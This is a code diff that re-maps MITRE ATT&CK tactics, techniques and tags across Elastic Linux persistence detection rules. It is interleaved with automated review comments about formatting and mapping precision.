@@ -200,11 +192,46 @@ id = "T1574.006" name = "Dynamic Linker Hijacking" reference = "https://attack.mitre.org/techniques/T1574/006/" +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1574" +name = "Hijack Execution Flow" +reference = "https://attack.mitre.org/techniques/T1574/" + +[[rule.threat.technique.subtechnique]] +id = "T1574.006" +name = "Dynamic Linker Hijacking" +reference = "https://attack.mitre.org/techniques/T1574/006/" + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1574" +name = "Hijack Execution Flow" +reference = "https://attack.mitre.org/techniques/T1574/" + +[[rule.threat.technique.subtechnique]] +id = "T1574.006" +name = "Dynamic Linker Hijacking" +reference = "https://attack.mitre.org/techniques/T1574/006/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" [rule.new_terms] field = "new_terms_fields" value = ["file.name", "process.name"] diff --git a/rules/linux/persistence_simple_web_server_connection_accepted.toml b/rules/linux/persistence_simple_web_server_connection_accepted.toml index 11e4f177db0..64589559842 100644 --- a/rules/linux/persistence_simple_web_server_connection_accepted.toml +++ b/rules/linux/persistence_simple_web_server_connection_accepted.toml @@ -2,7 +2,7 @@ creation_date = "2024/12/17" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/22" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
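Review bot: The last added line `+reference = "https://attack.mitre.org/tactics/TA0004/"` runs straight into the context line `[rule.new_terms]` with no separating blank line, while every other block in this hunk is blank-line separated; add an empty line after the TA0004 `reference` line. The three `[[rule.threat]]` entries that now repeat the same `T1574` / `T1574.006` block under Defense Evasion, Persistence and Privilege Escalation are the shape the per-framework `test_duplicated_tactics` accepts, and the tags hunk on the previous line lists the same three tactics in the same order. The same missing blank before `[rule.new_terms]` is left by the `@@ -107,35 +102,10 @@` hunk of persistence_rpm_package_installation_from_unusual_parent.toml (where the removed `-` lines took the old separator with them) and by the tactic hunk of persistence_ssh_via_backdoored_system_user.toml.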
@@ -80,16 +80,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g
 For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).
 """
 severity = "low"
-tags = [
- "Domain: Endpoint",
- "OS: Linux",
- "Use Case: Threat Detection",
- "Tactic: Persistence",
- "Tactic: Execution",
- "Tactic: Command and Control",
- "Data Source: Elastic Defend",
- "Resources: Investigation Guide",
-]
+tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Command and Control", "Tactic: Execution", "Data Source: Elastic Defend", "Resources: Investigation Guide"]
 timestamp_override = "event.ingested"
 type = "eql"
 query = '''
@@ -106,48 +97,30 @@ sequence by process.entity_id with maxspan=1m [[rule.threat]] framework = "MITRE ATT&CK" - [rule.threat.tactic] - name = "Persistence" - id = "TA0003" - reference = "https://attack.mitre.org/tactics/TA0003/" - - [[rule.threat.technique]] - id = "T1505" - name = "Server Software Component" - reference = "https://attack.mitre.org/techniques/T1505/" - - [[rule.threat.technique.subtechnique]] - id = "T1505.003" - name = "Web Shell" - reference = "https://attack.mitre.org/techniques/T1505/003/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - - [rule.threat.tactic] - name = "Execution" - id = "TA0002" - reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat.technique]] +id = "T1071" +name = "Application Layer Protocol" +reference = "https://attack.mitre.org/techniques/T1071/" - [[rule.threat.technique]] - id = "T1059" - name = "Command and Scripting Interpreter" - reference = "https://attack.mitre.org/techniques/T1059/" +[[rule.threat.technique.subtechnique]] +id = "T1071.001" +name = "Web Protocols" +reference = "https://attack.mitre.org/techniques/T1071/001/" - [[rule.threat.technique.subtechnique]] - name = "Unix Shell" - id = "T1059.004" - reference = "https://attack.mitre.org/techniques/T1059/004/" +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" [[rule.threat]] framework = "MITRE ATT&CK" - [rule.threat.tactic] - name = "Command and Control" - id = "TA0011" - reference = "https://attack.mitre.org/tactics/TA0011/" +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" - [[rule.threat.technique]] - name = "Application Layer Protocol" - id = "T1071" - reference = "https://attack.mitre.org/techniques/T1071/" +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" 
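Review bot: The new Execution entry keeps only the parent `T1059` and drops the `T1059.004` Unix Shell sub-technique that the removed block carried, so the hunk narrows the mapping's precision as a side effect of the tactic clean-up. If the sub-technique no longer fits (the query is outside this hunk, so whether the server is launched through a shell cannot be checked here), a word in the PR description would record that; otherwise re-add a `[[rule.threat.technique.subtechnique]]` block with `id = "T1059.004"` and `name = "Unix Shell"` under the T1059 block. The tags hunk on the previous line lists `Tactic: Command and Control` and `Tactic: Execution`, matching the two remaining entries. The `@@ -118,43 +106,7 @@` hunk of persistence_simple_web_server_creation.toml likewise drops `T1505.003` to the parent `T1505`; the same rationale should be stated there.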
diff --git a/rules/linux/persistence_simple_web_server_creation.toml b/rules/linux/persistence_simple_web_server_creation.toml index a36dadf7d26..c9053518df8 100644 --- a/rules/linux/persistence_simple_web_server_creation.toml +++ b/rules/linux/persistence_simple_web_server_creation.toml @@ -2,7 +2,7 @@ creation_date = "2024/12/17" integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/22" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -84,19 +84,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Persistence", - "Tactic: Execution", - "Tactic: Command and Control", - "Data Source: Elastic Defend", - "Data Source: Crowdstrike", - "Data Source: SentinelOne", - "Data Source: Elastic Endgame", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Persistence", "Data Source: Elastic Defend", "Data Source: Crowdstrike", "Data Source: SentinelOne", "Data Source: Elastic Endgame", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" 
@@ -118,43 +106,7 @@ id = "T1505" name = "Server Software Component" reference = "https://attack.mitre.org/techniques/T1505/" -[[rule.threat.technique.subtechnique]] -id = "T1505.003" -name = "Web Shell" -reference = "https://attack.mitre.org/techniques/T1505/003/" - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" - -[[rule.threat.technique.subtechnique]] -id = "T1059.004" -name = "Unix Shell" -reference = "https://attack.mitre.org/techniques/T1059/004/" - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1071" -name = "Application Layer Protocol" -reference = "https://attack.mitre.org/techniques/T1071/" - -[rule.threat.tactic] -id = "TA0011" -name = "Command and Control" -reference = "https://attack.mitre.org/tactics/TA0011/" diff --git a/rules/linux/persistence_site_and_user_customize_file_creation.toml b/rules/linux/persistence_site_and_user_customize_file_creation.toml index d0ae0b7eb1f..9802a00b6a8 100644 --- a/rules/linux/persistence_site_and_user_customize_file_creation.toml +++ b/rules/linux/persistence_site_and_user_customize_file_creation.toml @@ -2,7 +2,7 @@ creation_date = "2025/02/26" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/22" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
@@ -80,16 +80,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Persistence", - "Tactic: Execution", - "Tactic: Defense Evasion", - "Data Source: Elastic Defend", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Persistence", "Data Source: Elastic Defend", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -130,38 +121,7 @@ id = "T1546.018" name = "Python Startup Hooks" reference = "https://attack.mitre.org/techniques/T1546/018/" -[[rule.threat.technique]] -id = "T1574" -name = "Hijack Execution Flow" -reference = "https://attack.mitre.org/techniques/T1574/" - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" - -[[rule.threat.technique.subtechnique]] -id = "T1059.004" -name = "Unix Shell" -reference = "https://attack.mitre.org/techniques/T1059/004/" - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/linux/persistence_ssh_key_generation.toml b/rules/linux/persistence_ssh_key_generation.toml index e8f2c4ff724..a6266d7c8d8 100644 --- a/rules/linux/persistence_ssh_key_generation.toml +++ b/rules/linux/persistence_ssh_key_generation.toml 
@@ -2,7 +2,7 @@ creation_date = "2024/05/31" integration = ["endpoint", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -77,48 +77,3 @@ not file.name : "known_hosts.*" ''' -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1098" -name = "Account Manipulation" -reference = "https://attack.mitre.org/techniques/T1098/" -[[rule.threat.technique.subtechnique]] -id = "T1098.004" -name = "SSH Authorized Keys" -reference = "https://attack.mitre.org/techniques/T1098/004/" - - - -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1021" -name = "Remote Services" -reference = "https://attack.mitre.org/techniques/T1021/" -[[rule.threat.technique.subtechnique]] -id = "T1021.004" -name = "SSH" -reference = "https://attack.mitre.org/techniques/T1021/004/" - - -[[rule.threat.technique]] -id = "T1563" -name = "Remote Service Session Hijacking" -reference = "https://attack.mitre.org/techniques/T1563/" -[[rule.threat.technique.subtechnique]] -id = "T1563.001" -name = "SSH Hijacking" -reference = "https://attack.mitre.org/techniques/T1563/001/" - - - -[rule.threat.tactic] -id = "TA0008" -name = "Lateral Movement" -reference = "https://attack.mitre.org/tactics/TA0008/" - diff --git a/rules/linux/persistence_ssh_netcon.toml b/rules/linux/persistence_ssh_netcon.toml index bde9a2bb722..70955671bcf 100644 --- a/rules/linux/persistence_ssh_netcon.toml +++ b/rules/linux/persistence_ssh_netcon.toml @@ -2,7 +2,7 @@ creation_date = "2024/06/06" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/22" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
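Review bot: The `@@ -77,48 +77,3 @@` hunk removes every `[[rule.threat]]` block, leaving persistence_ssh_key_generation.toml with no ATT&CK mapping at all, and this file's diff carries no `tags` hunk; if its `tags` still list `Tactic: Persistence` or `Tactic: Lateral Movement` (the tags line is outside the diff, so this is inferred), the new `_mitre_tactic_tag_gaps` check will report them as orphaned tactic tags, and in any case the rule drops out of ATT&CK coverage views. Either keep one `[[rule.threat]]` entry that still fits the detection, or state in the PR description that an unmapped production rule is intended, and confirm the tags array contains no `Tactic:` entries. The same question applies to the `@@ -114,39 +114,3 @@` hunk of persistence_ssh_netcon.toml on the next line, which removes the Lateral Movement and Command and Control entries without a visible tags change.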
@@ -114,39 +114,3 @@ reference = "https://attack.mitre.org/techniques/T1546/004/" id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1021" -name = "Remote Services" -reference = "https://attack.mitre.org/techniques/T1021/" - -[[rule.threat.technique.subtechnique]] -id = "T1021.004" -name = "SSH" -reference = "https://attack.mitre.org/techniques/T1021/004/" - -[[rule.threat.technique]] -id = "T1563" -name = "Remote Service Session Hijacking" -reference = "https://attack.mitre.org/techniques/T1563/" - -[[rule.threat.technique.subtechnique]] -id = "T1563.001" -name = "SSH Hijacking" -reference = "https://attack.mitre.org/techniques/T1563/001/" - -[rule.threat.tactic] -id = "TA0008" -name = "Lateral Movement" -reference = "https://attack.mitre.org/tactics/TA0008/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[rule.threat.tactic] -id = "TA0011" -name = "Command and Control" -reference = "https://attack.mitre.org/tactics/TA0011/" diff --git a/rules/linux/persistence_ssh_via_backdoored_system_user.toml b/rules/linux/persistence_ssh_via_backdoored_system_user.toml index cf09a455608..1a90771db07 100644 --- a/rules/linux/persistence_ssh_via_backdoored_system_user.toml +++ b/rules/linux/persistence_ssh_via_backdoored_system_user.toml @@ -2,7 +2,7 @@ creation_date = "2025/01/07" integration = ["system"] maturity = "production" -updated_date = "2026/03/02" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
@@ -78,15 +78,7 @@ Filebeat is a lightweight shipper for forwarding and centralizing log data. Inst
 - To run the system module of Filebeat on Linux follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-system.html).
 """
 severity = "medium"
-tags = [
- "Domain: Endpoint",
- "OS: Linux",
- "Use Case: Threat Detection",
- "Tactic: Persistence",
- "Tactic: Defense Evasion",
- "Data Source: System",
- "Resources: Investigation Guide"
-]
+tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Initial Access", "Tactic: Persistence", "Data Source: System", "Resources: Investigation Guide"]
 timestamp_override = "event.ingested"
 type = "new_terms"
 query = '''
@@ -102,38 +94,37 @@ user.name:( framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1098" -name = "Account Manipulation" -reference = "https://attack.mitre.org/techniques/T1098/" +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" [[rule.threat.technique.subtechnique]] -id = "T1098.004" -name = "SSH Authorized Keys" -reference = "https://attack.mitre.org/techniques/T1098/004/" +id = "T1078.003" +name = "Local Accounts" +reference = "https://attack.mitre.org/techniques/T1078/003/" [rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" [[rule.threat]] framework = "MITRE ATT&CK" -[rule.threat.tactic] -name = "Defense Evasion" -id = "TA0005" -reference = "https://attack.mitre.org/tactics/TA0005/" - [[rule.threat.technique]] -id = "T1564" -name = "Hide Artifacts" -reference = "https://attack.mitre.org/techniques/T1564/" +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" [[rule.threat.technique.subtechnique]] -id = "T1564.002" -name = "Hidden Users" -reference = "https://attack.mitre.org/techniques/T1564/002/" +id = "T1078.003" +name = "Local Accounts" +reference = "https://attack.mitre.org/techniques/T1078/003/" +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" [rule.new_terms] field = "new_terms_fields" value = ["user.name", "host.id"] diff --git a/rules/linux/persistence_suspicious_file_opened_through_editor.toml b/rules/linux/persistence_suspicious_file_opened_through_editor.toml index a3db7c8cbe3..eb4b2615df6 100644 --- a/rules/linux/persistence_suspicious_file_opened_through_editor.toml +++ b/rules/linux/persistence_suspicious_file_opened_through_editor.toml 
@@ -2,7 +2,7 @@ creation_date = "2023/07/25" integration = ["endpoint", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
@@ -96,56 +96,116 @@ file.path : ( [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1037" name = "Boot or Logon Initialization Scripts" reference = "https://attack.mitre.org/techniques/T1037/" + [[rule.threat.technique.subtechnique]] id = "T1037.004" name = "RC Scripts" reference = "https://attack.mitre.org/techniques/T1037/004/" - [[rule.threat.technique]] id = "T1543" name = "Create or Modify System Process" reference = "https://attack.mitre.org/techniques/T1543/" + [[rule.threat.technique.subtechnique]] id = "T1543.002" name = "Systemd Service" reference = "https://attack.mitre.org/techniques/T1543/002/" +[[rule.threat.technique]] +id = "T1546" +name = "Event Triggered Execution" +reference = "https://attack.mitre.org/techniques/T1546/" + +[[rule.threat.technique.subtechnique]] +id = "T1546.004" +name = "Unix Shell Configuration Modification" +reference = "https://attack.mitre.org/techniques/T1546/004/" [[rule.threat.technique]] id = "T1574" name = "Hijack Execution Flow" reference = "https://attack.mitre.org/techniques/T1574/" + [[rule.threat.technique.subtechnique]] id = "T1574.006" name = "Dynamic Linker Hijacking" reference = "https://attack.mitre.org/techniques/T1574/006/" - +[[rule.threat.technique.subtechnique]] +id = "T1574.007" +name = "Path Interception by PATH Environment Variable" +reference = "https://attack.mitre.org/techniques/T1574/007/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1037" +name = "Boot or Logon Initialization Scripts" +reference = "https://attack.mitre.org/techniques/T1037/" + +[[rule.threat.technique.subtechnique]] +id = "T1037.004" +name = "RC Scripts" +reference = "https://attack.mitre.org/techniques/T1037/004/" + +[[rule.threat.technique]] +id = "T1543" +name = "Create or Modify System Process" +reference = "https://attack.mitre.org/techniques/T1543/" + 
+[[rule.threat.technique.subtechnique]] +id = "T1543.002" +name = "Systemd Service" +reference = "https://attack.mitre.org/techniques/T1543/002/" + +[[rule.threat.technique]] +id = "T1546" +name = "Event Triggered Execution" +reference = "https://attack.mitre.org/techniques/T1546/" + +[[rule.threat.technique.subtechnique]] +id = "T1546.004" +name = "Unix Shell Configuration Modification" +reference = "https://attack.mitre.org/techniques/T1546/004/" + [[rule.threat.technique]] id = "T1548" name = "Abuse Elevation Control Mechanism" reference = "https://attack.mitre.org/techniques/T1548/" + [[rule.threat.technique.subtechnique]] id = "T1548.003" name = "Sudo and Sudo Caching" reference = "https://attack.mitre.org/techniques/T1548/003/" +[[rule.threat.technique]] +id = "T1574" +name = "Hijack Execution Flow" +reference = "https://attack.mitre.org/techniques/T1574/" + +[[rule.threat.technique.subtechnique]] +id = "T1574.006" +name = "Dynamic Linker Hijacking" +reference = "https://attack.mitre.org/techniques/T1574/006/" +[[rule.threat.technique.subtechnique]] +id = "T1574.007" +name = "Path Interception by PATH Environment Variable" +reference = "https://attack.mitre.org/techniques/T1574/007/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" - diff --git a/rules/linux/persistence_suspicious_ssh_execution_xzbackdoor.toml b/rules/linux/persistence_suspicious_ssh_execution_xzbackdoor.toml index 793a712a67b..838efbe0499 100644 --- a/rules/linux/persistence_suspicious_ssh_execution_xzbackdoor.toml +++ b/rules/linux/persistence_suspicious_ssh_execution_xzbackdoor.toml @@ -2,7 +2,7 @@ creation_date = "2024/04/01" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/23" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
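Review bot: The blank-line separation in this hunk is inconsistent: a blank line is inserted before almost every table, but the new `[[rule.threat.technique.subtechnique]]` block for T1574.007 appears to be glued straight onto the T1574.006 `reference` line in both the Persistence and the Privilege Escalation entries (in the Persistence entry the old separating blank is removed as a `-` line rather than kept), and the T1574.007 `reference` runs directly into `[rule.threat.tactic]`. Inserting one blank line before `[[rule.threat.technique.subtechnique]]` for T1574.007 and before `[rule.threat.tactic]` keeps the file in the one-blank-line-per-table layout the rest of the hunk establishes. The TOML parses either way, so this is layout only.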
@@ -57,16 +57,7 @@ references = [ risk_score = 47 rule_id = "7afc6cc9-8800-4c7f-be6b-b688d2dea248" severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Credential Access", - "Tactic: Persistence", - "Tactic: Lateral Movement", - "Data Source: Elastic Defend", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Execution", "Tactic: Lateral Movement", "Data Source: Elastic Defend", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -93,27 +84,19 @@ sequence by host.id with maxspan=1m framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1543" -name = "Create or Modify System Process" -reference = "https://attack.mitre.org/techniques/T1543/" - -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" - -[[rule.threat]] -framework = "MITRE ATT&CK" +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" -[[rule.threat.technique]] -id = "T1556" -name = "Modify Authentication Process" -reference = "https://attack.mitre.org/techniques/T1556/" +[[rule.threat.technique.subtechnique]] +id = "T1059.004" +name = "Unix Shell" +reference = "https://attack.mitre.org/techniques/T1059/004/" [rule.threat.tactic] -id = "TA0006" -name = "Credential Access" -reference = "https://attack.mitre.org/tactics/TA0006/" +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" [[rule.threat]] framework = "MITRE ATT&CK" 
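Review bot: The `tags` array is collapsed from one entry per line to a single long line, which is a style regression separate from the tag change itself: the multi-line, trailing-comma form the hunk removes is what every rule file touched in this patch had, it keeps each tag diffable on its own line, and the new line is far past any usual line-length limit. Unless the repository formatter now emits the single-line form, keep `tags = [` followed by one quoted tag per line and a closing `]`. The same collapse happens in the tags hunks at L754, L756, L757, L759, L760, L761, L764, L765, L766, L768, L770 and L771.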
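Review bot: The Credential Access entry with `-id = "T1556"` is removed and replaced only by Execution / T1059.004, which describes the observable (sshd spawning a shell) but drops the technique that characterises the threat this rule is named after; if the rule still targets the xz/liblzma sshd backdoor, as the file name suggests, that backdoor is publicly documented as tampering with sshd's authentication path, which is T1556 Modify Authentication Process. Keeping a third `[[rule.threat]]` entry with `[rule.threat.tactic]` `id = "TA0006"` and technique T1556, or stating in the description why the mapping was narrowed to what the sequence query observes, would preserve that pivot for analysts hunting by technique. The tags hunk earlier on this line is consistent with the new mapping, so a restored entry needs the matching `Tactic: Credential Access` tag as well.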
@@ -128,16 +111,6 @@ id = "T1021.004" name = "SSH" reference = "https://attack.mitre.org/techniques/T1021/004/" -[[rule.threat.technique]] -id = "T1563" -name = "Remote Service Session Hijacking" -reference = "https://attack.mitre.org/techniques/T1563/" - -[[rule.threat.technique.subtechnique]] -id = "T1563.001" -name = "SSH Hijacking" -reference = "https://attack.mitre.org/techniques/T1563/001/" - [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" diff --git a/rules/linux/persistence_systemd_generator_creation.toml b/rules/linux/persistence_systemd_generator_creation.toml index 1405518b4e7..b706888c01e 100644 --- a/rules/linux/persistence_systemd_generator_creation.toml +++ b/rules/linux/persistence_systemd_generator_creation.toml @@ -2,7 +2,7 @@ creation_date = "2024/06/19" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/23" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -84,15 +84,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Persistence", - "Tactic: Privilege Escalation", - "Data Source: Elastic Defend", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Persistence", "Data Source: Elastic Defend", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" query = ''' 
@@ -129,34 +121,11 @@ file where host.os.type == "linux" and event.action in ("rename", "creation") an framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1543" -name = "Create or Modify System Process" -reference = "https://attack.mitre.org/techniques/T1543/" - -[[rule.threat.technique.subtechnique]] -id = "T1543.002" -name = "Systemd Service" -reference = "https://attack.mitre.org/techniques/T1543/002/" +id = "T1546" +name = "Event Triggered Execution" +reference = "https://attack.mitre.org/techniques/T1546/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1543" -name = "Create or Modify System Process" -reference = "https://attack.mitre.org/techniques/T1543/" - -[[rule.threat.technique.subtechnique]] -id = "T1543.002" -name = "Systemd Service" -reference = "https://attack.mitre.org/techniques/T1543/002/" - -[rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/linux/persistence_systemd_netcon.toml b/rules/linux/persistence_systemd_netcon.toml index 3d67cd46113..010e0f2e8fc 100644 --- a/rules/linux/persistence_systemd_netcon.toml +++ b/rules/linux/persistence_systemd_netcon.toml @@ -2,7 +2,7 @@ creation_date = "2024/02/01" integration = ["endpoint"] maturity = "production" -updated_date = "2026/01/26" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
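Review bot: `T1546` Event Triggered Execution is kept only under the Persistence entry while the whole Privilege Escalation `[[rule.threat]]` entry is deleted, yet in this same patch the editor rule (hunk at L751) lists T1546.004 under both Persistence and Privilege Escalation. ATT&CK attributes T1546 to both tactics, so the two rules now follow different conventions for the same technique; pick one (either restore a Privilege Escalation entry with T1546 here and keep the `Tactic: Privilege Escalation` tag, or drop the duplicated entries in the editor rule) and apply it consistently. If the single-tactic form is intended because generator creation alone does not show whether the generator runs elevated, a short note in the PR description would save the next reviewer the same question.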
@@ -82,16 +82,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Persistence", - "Tactic: Command and Control", - "Tactic: Defense Evasion", - "Data Source: Elastic Defend", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Command and Control", "Tactic: Execution", "Tactic: Persistence", "Data Source: Elastic Defend", "Resources: Investigation Guide"] type = "eql" query = ''' sequence by host.id with maxspan=5s @@ -136,6 +127,37 @@ sequence by host.id with maxspan=5s [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1095" +name = "Non-Application Layer Protocol" +reference = "https://attack.mitre.org/techniques/T1095/" + +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1569" +name = "System Services" +reference = "https://attack.mitre.org/techniques/T1569/" + +[[rule.threat.technique.subtechnique]] +id = "T1569.002" +name = "Service Execution" +reference = "https://attack.mitre.org/techniques/T1569/002/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1543" name = "Create or Modify System Process" 
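Review bot: The new Command and Control entry adds `id = "T1095"` Non-Application Layer Protocol, but nothing visible in this hunk establishes the protocol layer of the connection; the query context shows only `sequence by host.id with maxspan=5s`, i.e. a systemd-spawned process followed by a network event. Before this change the entry was tactic-only, which is the honest level of precision for a detection that sees a connection but not its protocol, and the same patch removes T1071 from the web-server rules (L769, L770), which suggests the same concern applies there. Either revert to the tactic-only entry or document in the description what makes T1095 the right sub-claim. The Execution / T1569.002 addition in the same hunk reads correctly for a service-started process.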
@@ -146,28 +168,7 @@ id = "T1543.002" name = "Systemd Service" reference = "https://attack.mitre.org/techniques/T1543/002/" -[[rule.threat.technique]] -id = "T1574" -name = "Hijack Execution Flow" -reference = "https://attack.mitre.org/techniques/T1574/" - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[rule.threat.tactic] -id = "TA0011" -name = "Command and Control" -reference = "https://attack.mitre.org/tactics/TA0011/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/linux/persistence_systemd_service_started.toml b/rules/linux/persistence_systemd_service_started.toml index 4d7bc96589f..142f84b49eb 100644 --- a/rules/linux/persistence_systemd_service_started.toml +++ b/rules/linux/persistence_systemd_service_started.toml @@ -2,7 +2,7 @@ creation_date = "2024/05/17" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/23" +updated_date = "2026/03/23" [transform] [[transform.osquery]] 